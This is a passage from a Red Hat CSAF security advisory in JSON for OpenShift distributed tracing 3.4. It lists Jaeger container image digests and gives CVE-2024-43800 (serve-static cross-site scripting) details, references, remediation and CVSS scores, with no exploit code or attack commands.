3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "send: Code Execution Vulnerability in Send Library" }, { "cve": "CVE-2024-43800", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-10T15:30:33.631718+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2311154" } ], "notes": [ { "category": "description", "text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", "title": "Vulnerability description" }, { "category": "summary", "text": "serve-static: Improper Sanitization in serve-static", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-43800" }, { "category": "external", "summary": "RHBZ#2311154", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800", "url": "https://www.cve.org/CVERecord?id=CVE-2024-43800" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800" }, { "category": "external", "summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", "url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b" }, { "category": "external", "summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", "url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa" }, { "category": "external", "summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", "url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p" } ], "release_date": "2024-09-10T15:15:17.937000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 